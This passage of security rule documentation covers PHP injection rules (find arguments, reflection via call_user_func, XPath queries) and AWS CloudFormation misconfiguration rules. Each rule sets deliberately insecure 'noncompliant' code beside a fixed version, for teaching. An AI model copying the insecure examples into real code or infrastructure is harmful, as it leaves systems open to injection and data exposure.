  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

$input = $_GET['input'];
system('/usr/bin/find ' . escapeshellarg($input)); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

$input = $_GET['input'];
if (in_array($input, $allowed, true)) {
  system('/usr/bin/find ' . escapeshellarg($input));
}
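The same pattern sketched in Python; the directory names are hypothetical, and building the command as an argument vector (rather than a shell string) avoids shell interpretation entirely:

```python
# Hypothetical data layout: user-visible names map to subdirectories
# under a fixed base path.
ALLOWED = {"docs", "images", "logs"}

def find_in(subdir: str) -> list:
    if subdir not in ALLOWED:
        raise ValueError("argument not allowed")
    # An argument vector for subprocess.run(argv): no shell is involved,
    # and the allow-list prevents dangerous find arguments like -delete.
    return ["/usr/bin/find", "/srv/data/" + subdir]
```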

See

phpsecurity:S6173

Why is this an issue?

Reflection injections occur in a web application when it retrieves data from a user or a third-party service and fully or partially uses it to inspect, load or invoke a component by name.

If an application uses a reflection method in a way that is vulnerable to injections, it is exposed to attacks that aim to achieve remote code execution on the server’s website.

A user with malicious intent exploits this by carefully crafting a string referencing symbols such as class or method names, turning the initial reflection logic into an impactful malicious one.

After crafting the malicious request and triggering it, the attacker can attack the servers affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

If user-supplied values are used to choose which code is executed, an attacker may be able to supply carefully-chosen values that cause unexpected code to run. The attacker can use this ability to run arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting a seemingly legitimate object whose properties can nevertheless be used maliciously.

Depending on the application, attackers might be able to modify important data structures or content to escalate privileges or perform unwanted actions. For example, with an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

In the following example, the code simulates a feature in an image editing application that allows users to install plugins to add new filters or effects. It assumes the user will give a known name, such as "SepiaEffect".

Noncompliant code example

function apply($effectName)
{
    try {
        $result = call_user_func($effectName, "applyFilter");
    } catch (\Throwable $e) {
        return "Filter Failure";
    }

    if ($result == true) {
        return "Filter Success";
    } else {
        return "Filter Failure";
    }
}

apply($_GET["filter"]);

Compliant solution

$EFFECT_ALLOW_LIST = [
    "SepiaEffect",
    "BlackAndWhiteEffect",
    "WaterColorEffect",
    "OilPaintingEffect"
];

function apply($effectName)
{
    global $EFFECT_ALLOW_LIST;
    if (!in_array($effectName, $EFFECT_ALLOW_LIST)) {
        return "Filter Failure";
    }

    try {
        $result = call_user_func($effectName, "applyFilter");
    } catch (\Throwable $e) {
        return "Filter Failure";
    }

    if ($result == true) {
        return "Filter Success";
    } else {
        return "Filter Failure";
    }
}

apply($_GET["filter"]);

How does this work?

Pre-Approved commands

The cleanest way to avoid this defect is to validate the input before using it in a reflection method.

Create a list of authorized and secure classes that you want the application to be able to execute.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must perform this validation on the server side, not in client-side front-ends.
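One way to express such an allow-list is a dispatch table mapping names to pre-approved callables, sketched here in Python with a hypothetical effect function:

```python
def sepia_effect(action: str) -> bool:
    # Hypothetical stand-in for a real plugin entry point.
    return action == "applyFilter"

# Pre-approved callables only; user input can never name an arbitrary symbol.
EFFECTS = {"SepiaEffect": sepia_effect}

def apply_effect(name: str) -> str:
    func = EFFECTS.get(name)
    if func is None:
        return "Filter Failure"  # unknown names are rejected server-side
    return "Filter Success" if func("applyFilter") else "Filter Failure"
```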

Resources

Articles & blog posts

Standards

phpsecurity:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection:
After discovering the injection point, attackers insert data into the vulnerable field to run malicious queries against the affected XML documents.

The impact of this vulnerability depends on the importance of XML structures in the enterprise.
Where organizations rely on XML structures for business-critical operations, an attack can be critical; where XML is used only for innocuous data transport, it can be harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in Core PHP

Code examples

The following noncompliant code is vulnerable to XPath injection because untrusted data is concatenated to an XPath query without prior validation.

Noncompliant code example

function authenticate(DOMXpath $xpath, string $username, string $password): bool {
    $expression = "/users/user[@name='" . $username . "' and @pass='" . $password . "']";
    $entries = $xpath->evaluate($expression);

    return $entries->length > 0;
}

Compliant solution

function authenticate(DOMXpath $xpath, string $username, string $password): bool {
    if (!preg_match("/^[a-zA-Z0-9]*$/", $username) || !preg_match("/^[a-zA-Z0-9]*$/", $password)) {
        return false;
    }

    $expression = "/users/user[@name='" . $username . "' and @pass='" . $password . "']";
    $entries = $xpath->evaluate($expression);

    return $entries->length > 0;
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Validation

In case XPath parameterized queries are not available, the most secure way to protect against injections is to validate the input before using it in an XPath query.

Important: The application must do this validation server-side. Validating this client-side is insecure.

Input can be validated in multiple ways:

  • By checking against a list of authorized and secure strings that the application is allowed to use in a query.
  • By ensuring user input is restricted to a specific range of characters (e.g., the regex /^[a-zA-Z0-9]*$/ only allows alphanumeric characters.)
  • By ensuring user input does not include any XPath metacharacters, such as ", ', /, @, =, *, [, ], ( and ).

If user input is not considered valid, it should be rejected as it is unsafe.

In the compliant solution, a regex match ensures the username and password only contain alphanumeric characters before executing the XPath query.
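The same alphanumeric validation, sketched in Python for illustration:

```python
import re

# Same character class as the compliant solution's regex.
SAFE = re.compile(r"[a-zA-Z0-9]*")

def is_valid(value: str) -> bool:
    # fullmatch ensures the entire input is alphanumeric, so XPath
    # metacharacters such as quotes, /, @, [ and ] are rejected.
    return SAFE.fullmatch(value) is not None
```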

Resources

Articles & blog posts

Standards

cloudformation:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allow publisher systems to fan out messages to a large number of subscriber systems. Amazon SNS can encrypt messages as soon as it receives them, so that adversaries who gain physical access to the storage medium, or who otherwise obtain a message, cannot access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::SNS::Topic:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Topic:  # Sensitive, encryption disabled by default
    Type: AWS::SNS::Topic
    Properties:
      DisplayName: "unencrypted_topic"

Compliant Solution

For AWS::SNS::Topic:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Topic:
    Type: AWS::SNS::Topic
    Properties:
      DisplayName: "encrypted_topic"
      KmsMasterKeyId:
        Fn::GetAtt:
          - TestKey
          - KeyId

See

cloudformation:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in API Gateway

Code examples

These code samples illustrate how to fix this issue in both APIGateway and ApiGatewayV2.

Noncompliant code example

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi:
    Type: AWS::ApiGateway::DomainName
    Properties:
      SecurityPolicy: "TLS_1_0"  # Noncompliant

An ApiGatewayV2 domain name uses a weak TLS version by default:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi: # Noncompliant
    Type: AWS::ApiGatewayV2::DomainName

Compliant solution

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi:
    Type: AWS::ApiGateway::DomainName
    Properties:
      SecurityPolicy: "TLS_1_2"

For AWS::ApiGatewayV2::DomainName:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi:
    Type: AWS::ApiGatewayV2::DomainName
    Properties:
      DomainNameConfigurations:
        - SecurityPolicy: "TLS_1_2"

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback is that an outdated framework’s TLS v1.2 settings may enable older cipher suites that are now deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

cloudformation:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. If an identity has permission to access all resources even though it only requires access to some non-sensitive ones, unauthorized access to and disclosure of sensitive information can occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., to grant access only to the necessary resources. A good practice is to organize or tag resources according to the sensitivity level of the data they store or process; this makes secure access control less error-prone.

Sensitive Code Example

Update permission is granted for all policies using the wildcard (*) in the Resource property:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "iam:CreatePolicyVersion"
                  Resource:
                    - "*" # Sensitive
        Roles:
            - !Ref MyRole

Compliant Solution

Restrict update permission to the appropriate subset of policies:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "iam:CreatePolicyVersion"
                  Resource:
                    - !Sub "arn:aws:iam::${AWS::AccountId}:policy/team1/*"
        Roles:
            - !Ref MyRole

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

cloudformation:S6249

By default, S3 buckets can be accessed through the HTTP and HTTPS protocols.

As HTTP is a clear-text protocol, it lacks encryption of the transported data and cannot establish an authenticated connection. This means that a malicious actor who can intercept traffic on the network can read, modify, or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to deny all HTTP requests:

  • for all objects (*) of the bucket
  • for all principals (*)
  • for all actions (*)

Sensitive Code Example

No secure policy is attached to this S3 bucket:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive

A policy is defined, but it forces HTTPS communication for only some users:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "mynoncompliantbucket"

  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy'
    Properties:
      Bucket: !Ref S3Bucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Deny
            Principal:
              AWS: # Sensitive: only one principal is forced to use https
                - 'arn:aws:iam::123456789123:root'
            Action: "*"
            Resource: arn:aws:s3:::mynoncompliantbuckets6249/*
            Condition:
              Bool:
                "aws:SecureTransport": false

Compliant Solution

A secure policy that denies the use of all HTTP requests:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "mycompliantbucket"

  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy'
    Properties:
      Bucket: "mycompliantbucket"
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Deny
            Principal:
              AWS: "*" # all principals should use https
            Action: "*" # for any actions
            Resource: arn:aws:s3:::mycompliantbucket/* # for any resources
            Condition:
              Bool:
                "aws:SecureTransport": false

See

cloudformation:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

The decision to allow public access may be made for various reasons, such as quick maintenance or saving time, or it may simply happen by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, make sure no listener is created for the public IP address.

Sensitive Code Example

DMS and EC2 instances have a public IP address assigned to them:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  DMSInstance:
    Type: AWS::DMS::ReplicationInstance
    Properties:
      PubliclyAccessible: true # sensitive, by default it's also set to true

  EC2Instance:
    Type: AWS::EC2::Instance
    Properties:
      NetworkInterfaces:
        - AssociatePublicIpAddress: true # sensitive, by default it's also set to true
          DeviceIndex: "0"

Compliant Solution

DMS and EC2 instances don’t have a public IP address:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  DMSInstance:
    Type: AWS::DMS::ReplicationInstance
    Properties:
      PubliclyAccessible: false

  EC2Instance:
    Type: AWS::EC2::Instance
    Properties:
      NetworkInterfaces:
        - AssociatePublicIpAddress: false
          DeviceIndex: "0"

See

cloudformation:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed: as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk theft, improper disposal of disks, and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.
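
For reference, here is a minimal sketch of how SSE-KMS could be configured on a bucket in CloudFormation; the KMS key reference (MyKmsKey) is a placeholder and must point to a key defined elsewhere in the template or account:

```yaml
AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket'
    Properties:
      BucketEncryption:
        ServerSideEncryptionConfiguration:
          - ServerSideEncryptionByDefault:
              SSEAlgorithm: 'aws:kms'        # use KMS-managed keys instead of SSE-S3
              KMSMasterKeyID: !Ref MyKmsKey  # placeholder: a KMS key defined elsewhere
```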

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply with regulations, such as HIPAA or PCI DSS, or with other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive

Compliant Solution

Server-side encryption with Amazon S3-Managed Keys is used:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketEncryption:
        ServerSideEncryptionConfiguration:
          - ServerSideEncryptionByDefault:
              SSEAlgorithm: AES256

See

cloudformation:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances that attackers successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application follows the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

For AWS Kinesis Data Streams, server-side encryption is disabled by default:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  KinesisStream: # Sensitive
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: 1
      # No StreamEncryption

For Amazon ElastiCache:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::ElastiCache::ReplicationGroup
    Properties:
      ReplicationGroupId: "example"
      TransitEncryptionEnabled: false  # Sensitive

For Amazon ECS:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  EcsTask:
    Type: AWS::ECS::TaskDefinition
    Properties:
      Family: "service"
      Volumes:
        -
          Name: "storage"
          EFSVolumeConfiguration:
            FilesystemId: !Ref FS
            TransitEncryption: "DISABLED"  # Sensitive

For AWS Load Balancer Listeners:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  HTTPlistener:
   Type: "AWS::ElasticLoadBalancingV2::Listener"
   Properties:
     DefaultActions:
       - Type: "redirect"
         RedirectConfig:
           Protocol: "HTTP"
     Protocol: "HTTP" # Sensitive

For Amazon OpenSearch domains:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::OpenSearchService::Domain
    Properties:
      DomainName: example
      DomainEndpointOptions:
        EnforceHTTPS: false # Sensitive
      NodeToNodeEncryptionOptions:
        Enabled: false # Sensitive

For Amazon MSK communications between clients and brokers:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  MSKCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: MSKCluster
      EncryptionInfo:
        EncryptionInTransit:
          ClientBroker: TLS_PLAINTEXT # Sensitive
          InCluster: false # Sensitive

Compliant Solution

For AWS Kinesis Data Streams server-side encryption:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  KinesisStream:
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: 1
      StreamEncryption:
         EncryptionType: KMS
         KeyId: alias/aws/kinesis

For Amazon ElastiCache:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::ElastiCache::ReplicationGroup
    Properties:
      ReplicationGroupId: "example"
      TransitEncryptionEnabled: true

For Amazon ECS:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  EcsTask:
    Type: AWS::ECS::TaskDefinition
    Properties:
      Family: "service"
      Volumes:
        -
          Name: "storage"
          EFSVolumeConfiguration:
            FilesystemId: !Ref FS
            TransitEncryption: "ENABLED"

For AWS Load Balancer Listeners:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  HTTPlistener:
   Type: "AWS::ElasticLoadBalancingV2::Listener"
   Properties:
     DefaultActions:
       - Type: "redirect"
         RedirectConfig:
           Protocol: "HTTPS"
     Protocol: "HTTP"

For Amazon OpenSearch domains:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::OpenSearchService::Domain
    Properties:
      DomainName: example
      DomainEndpointOptions:
        EnforceHTTPS: true
      NodeToNodeEncryptionOptions:
        Enabled: true

For Amazon MSK communications between clients and brokers, data in transit is encrypted by default, allowing you to omit writing the EncryptionInTransit configuration. However, if you need to configure it explicitly, this configuration is compliant:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  MSKCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: MSKCluster
      EncryptionInfo:
        EncryptionInTransit:
          ClientBroker: TLS
          InCluster: true

See

cloudformation:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For AWS::RDS::DBInstance and AWS::RDS::DBCluster:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  DatabaseInstance:
    Type: AWS::RDS::DBInstance
    Properties:
      StorageEncrypted: false  # Sensitive, disabled by default
  DatabaseCluster:
    Type: AWS::RDS::DBCluster
    Properties:
      StorageEncrypted: false  # Sensitive, disabled by default

Compliant Solution

For AWS::RDS::DBInstance and AWS::RDS::DBCluster:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  DatabaseInstance:
    Type: AWS::RDS::DBInstance
    Properties:
      StorageEncrypted: true
  DatabaseCluster:
    Type: AWS::RDS::DBCluster
    Properties:
      StorageEncrypted: true
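
If control over the encryption key is required, encryption at rest can also reference a customer-managed KMS key. This is a sketch, and MyKmsKey is a placeholder for a key defined elsewhere:

```yaml
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  DatabaseInstance:
    Type: AWS::RDS::DBInstance
    Properties:
      StorageEncrypted: true
      KmsKeyId: !Ref MyKmsKey  # placeholder: customer-managed KMS key
```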

See

cloudformation:S6302

A policy that grants all permissions may indicate an improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwriting of resources may occur and therefore result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., to grant identities only the permissions they need. A good practice is to start with the very minimum set of permissions and to refine the policy over time. To fix overly permissive policies already deployed in production, review the monitored activity and reduce the set of permissions to those actually used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "*" # Sensitive
                  Resource:
                    - !Ref MyResource
        Roles:
            - !Ref MyRole

Compliant Solution

A customer-managed policy that grants only the required permissions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "s3:GetObject"
                  Resource:
                    - !Ref MyResource
        Roles:
            - !Ref MyRole

See

cloudformation:S6308

Amazon Elasticsearch Service (ES) is a managed service to host Elasticsearch instances.

To harden domain (cluster) data in case of unauthorized access, ES provides data-at-rest encryption if the Elasticsearch version is 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, if adversaries gain physical access to the storage medium, they cannot access the data.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt Elasticsearch domains that contain sensitive information.

Encryption and decryption are handled transparently by ES, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::Elasticsearch::Domain:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Elasticsearch:
    Type: AWS::Elasticsearch::Domain
    Properties:
      EncryptionAtRestOptions:
        Enabled: false  # Sensitive, disabled by default

Compliant Solution

For AWS::Elasticsearch::Domain:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Elasticsearch:
    Type: AWS::Elasticsearch::Domain
    Properties:
      EncryptionAtRestOptions:
        Enabled: true

See

cloudformation:S6321

Why is this an issue?

Cloud platforms such as AWS support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      VpcId: !Ref ExampleVpc
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 22
          ToPort: 22 # SSH traffic
          CidrIp: "0.0.0.0/0" # from all IP addresses is authorized

Compliant solution

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      VpcId: !Ref ExampleVpc
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 22
          ToPort: 22
          CidrIp: "1.2.3.0/24"

Resources

Documentation

Standards

cloudformation:S6364

Reducing the backup retention duration can reduce an organization’s ability to re-establish service in case of a security incident.

Data backups make it possible to overcome corruption or unavailability of data by recovering as efficiently as possible from a security incident.

Backup retention duration, coverage, and backup locations are essential criteria regarding functional continuity.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
